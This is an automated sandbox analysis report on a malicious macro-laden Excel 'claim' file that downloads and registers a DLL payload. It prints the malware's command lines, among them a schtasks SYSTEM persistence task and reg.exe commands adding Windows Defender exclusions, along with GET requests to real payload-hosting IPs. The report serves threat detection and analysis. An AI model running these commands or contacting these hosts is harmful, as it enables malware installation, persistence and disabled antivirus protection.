Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Claim-838392655-09242021.xls

Overview

General Information

Sample Name:Claim-838392655-09242021.xls
Analysis ID:491203
MD5:295dbcf85c2baffd99e4670c21afc93c
SHA1:3dfb83a771615b879d20445ff5e5143d5846de6a
SHA256:acf0a503e9bdf8a32edfb667776fd159a70f4f9173c01c024c82bb6dd658e451
Tags:xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2824 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1320 cmdline: regsvr32 -silent ..\Fiosa.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2196 cmdline: -silent ..\Fiosa.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2592 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2820 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 1516 cmdline: regsvr32 -silent ..\Fiosa1.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2152 cmdline: -silent ..\Fiosa1.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 3060 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
    • regsvr32.exe (PID: 2972 cmdline: regsvr32 -silent ..\Fiosa2.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2012 cmdline: -silent ..\Fiosa2.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2100 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • regsvr32.exe (PID: 1812 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2788 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 536 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 840 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2188 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nqsaq' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 2684 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1184 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Claim-838392655-09242021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Fiosa.der, CommandLine: regsvr32 -silent ..\Fiosa.der, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2824, ProcessCommandLine: regsvr32 -silent ..\Fiosa.der, ProcessId: 1320
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Fiosa.der, CommandLine: -silent ..\Fiosa.der, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Fiosa.der, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1320, ProcessCommandLine: -silent ..\Fiosa.der, ProcessId: 2196

    Persistence and Installation Behavior:

    barindex
    Sigma detected: Schedule system processShow sources
    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2592, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24, ProcessId: 2820

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: Claim-838392655-09242021.xlsReversingLabs: Detection: 26%
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].datMetadefender: Detection: 28%Perma Link
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].datReversingLabs: Detection: 28%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].datMetadefender: Detection: 28%Perma Link
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].datReversingLabs: Detection: 28%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].datMetadefender: Detection: 28%Perma Link
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].datReversingLabs: Detection: 28%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.522715533.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.576566085.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 23_2_0008AEB4 FindFirstFileW,FindNextFileW,

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44466.4649013889[1].dat.0.drJump to dropped file
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.173:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.173:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 09:10:25 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.4649013889.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 09:10:30 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.4649013889.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 09:10:32 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.4649013889.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /44466.4649013889.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.4649013889.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.4649013889.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: regsvr32.exe, 00000005.00000002.519787979.0000000002370000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575187514.00000000020D0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000004.00000002.523226546.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.519424175.0000000001E40000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.578213273.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.574806742.0000000001C10000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000005.00000002.519787979.0000000002370000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575187514.00000000020D0000.00000002.00020000.sdmp, explorer.exe, 00000008.00000002.906659825.0000000002070000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].datJump to behavior
